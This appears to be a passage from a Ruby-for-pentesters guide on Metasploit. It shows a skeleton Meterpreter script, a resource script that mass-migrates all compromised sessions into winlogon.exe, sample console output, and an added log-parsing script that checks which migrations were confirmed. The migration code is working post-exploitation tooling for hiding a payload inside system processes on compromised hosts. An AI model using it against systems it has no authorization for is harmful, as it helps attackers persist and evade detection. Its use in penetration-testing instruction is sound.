Meterpreter Scripting
Since Meterpreter scripting is planned to be removed and replaced with post modules, only a skeleton Meterpreter script is shown here.
You can place your new Meterpreter script in either of:
- the framework itself: metasploit-framework/scripts/meterpreter
- your Metasploit user path: ~/.msf/scripts/meterpreter
Absolute Meterpreter Script
# $Id$
# $Revision$
# Author:
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
sample_option_var = nil
@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-o" => [ true , "Option that requires a value"]
)
meter_type = client.platform
################## Function Declarations ##################
# Usage Message Function
#-------------------------------------------------------------------------------
def usage
print_line "Meterpreter Script for INSERT PURPOSE."
print_line(@exec_opts.usage)
raise Rex::Script::Completed
end
# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
def wrong_meter_version(meter = meter_type)
print_error("#{meter} version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
################## Main ##################
@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
usage
when "-o"
sample_option_var = val
end
}
# Check for Version of Meterpreter
wrong_meter_version(meter_type) if meter_type !~ /win32|win64|java|php|linux/i # Remove unsupported versions
The script is directly quoted from the Metasploit samples.
Run Process migration on multiple meterpreter sessions
From `msfconsole`, after obtaining all Meterpreter sessions, select post/windows/manage/migrate:
use post/windows/manage/migrate
Note: make sure you have sufficient privileges to migrate to the designated process.
Then create a file with the .rc extension, wrapping the Ruby code in <ruby> </ruby> tags:
mass-migration.rc
<ruby>
# Find a PID by process name; returns nil when no process with that name exists
def find_pid(session_num, session, process)
print_status("Session #{session_num} | Finding PID of processe #{process}")
session.sys.process.get_processes().each do |x|
proc_name, proc_id = x['name'].downcase, x['pid']
return proc_id if proc_name == process.downcase
end
nil # without this, `each` would return the whole process list when nothing matched
end
process = 'winlogon.exe'
framework.sessions.each do |num,session|
run_single("set PID #{find_pid(num, session, process)}")
run_single("set SESSION #{num}")
print_status("Running #{active_module.fullname} against session #{num}")
run_single("run -j")
sleep 1
end
</ruby>
Now, from msfconsole,
resource /home/rubyfu/mass-migration.rc
The result will be similar to:
[*] Running post/windows/manage/migrate against session 2
[*] Post module running as background job
[*] Running module against WIN-NG118S6TM0H
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate to
[*] Session 2 | Finding PID of processe winlogon.exe
[+] Migrating to 3628
SESSION => 3
[*] Running post/windows/manage/migrate against session 3
[*] Post module running as background job
[*] Running module against HOME
[*] Current server process: shell.exe (2684)
[*] Session 3 | Finding PID of processe winlogon.exe
[+] Migrating to 2444
SESSION => 4
[*] Running post/windows/manage/migrate against session 4
[*] Post module running as background job
[*] Running module against WIN-8H4IDI0SR5A
[*] Current server process: shell.exe (2996)
[*] Session 4 | Finding PID of processe winlogon.exe
[+] Migrating to 2240
[+] Successfully migrated to process 3628
[+] Successfully migrated to process 2444
[+] Successfully migrated to process 2240
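Because the migrate module runs as a background job (`run -j`), the "Successfully migrated" confirmations arrive after all the "Migrating to" lines, so you cannot tell from reading order alone which sessions finished. The following stand-alone Ruby script is an added example (it is not part of RubyFu or Metasploit) that reconciles a saved copy of this output: it pairs each session's requested target PID with its confirmation and lists sessions that were never confirmed, which is what you want in an engagement record. The line formats are taken from the output above; the sample log is constructed and trimmed, and the last session's confirmation is deliberately missing to show the check.

```ruby
# Added example (not RubyFu's or Metasploit's code): reconcile msfconsole
# mass-migration output so that every requested migration is matched
# against a "Successfully migrated to process" confirmation.

# Constructed sample, modelled on the output shown above; session 4's
# confirmation is intentionally absent.
SAMPLE_OUTPUT = <<~LOG
[*] Running post/windows/manage/migrate against session 2
[*] Post module running as background job
[*] Running module against WIN-NG118S6TM0H
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3628
SESSION => 3
[*] Running post/windows/manage/migrate against session 3
[*] Post module running as background job
[*] Current server process: shell.exe (2684)
[+] Migrating to 2444
SESSION => 4
[*] Running post/windows/manage/migrate against session 4
[*] Post module running as background job
[*] Current server process: shell.exe (2996)
[+] Migrating to 2240
[+] Successfully migrated to process 3628
[+] Successfully migrated to process 2444
LOG

# Parse the log into one record per session:
#   { session: Integer, from: String, target_pid: Integer or nil, confirmed: true/false }
def parse_migration_log(text)
  records = {}   # keyed by session number, keeps insertion order
  current = nil  # session whose block of output we are currently inside
  text.each_line do |raw|
    line = raw.strip.sub(/\A\[[*+\-!]\]\s*/, '') # drop the [*] / [+] prefix
    case line
    when %r{\ARunning post/windows/manage/migrate against session (\d+)\z}
      current = Regexp.last_match(1).to_i
      records[current] = { session: current, from: nil, target_pid: nil, confirmed: false }
    when /\ACurrent server process: (.+)\z/
      records[current][:from] = Regexp.last_match(1) if current
    when /\AMigrating to (\d+)\z/
      records[current][:target_pid] = Regexp.last_match(1).to_i if current
    when /\ASuccessfully migrated to process (\d+)\z/
      # Confirmations are printed by background jobs, so match them by PID,
      # not by whichever session block we happen to be in.
      pid = Regexp.last_match(1).to_i
      rec = records.values.find { |r| r[:target_pid] == pid }
      rec[:confirmed] = true if rec
    end
  end
  records.values
end

# Session numbers whose migration was requested but never confirmed.
def unconfirmed_sessions(records)
  records.reject { |r| r[:confirmed] }.map { |r| r[:session] }
end

# Print a one-line summary per session and return the unconfirmed ones.
def report(text)
  records = parse_migration_log(text)
  records.each do |r|
    status = r[:confirmed] ? 'ok' : 'UNCONFIRMED'
    puts "session #{r[:session]}: #{r[:from]} -> pid #{r[:target_pid] || '?'} [#{status}]"
  end
  unconfirmed_sessions(records)
end

report(SAMPLE_OUTPUT) if $PROGRAM_NAME == __FILE__
```

Run it against a file captured with `spool` or copied from the console; any session it reports as UNCONFIRMED still has its original server process and should be checked by hand before assuming the migration took place.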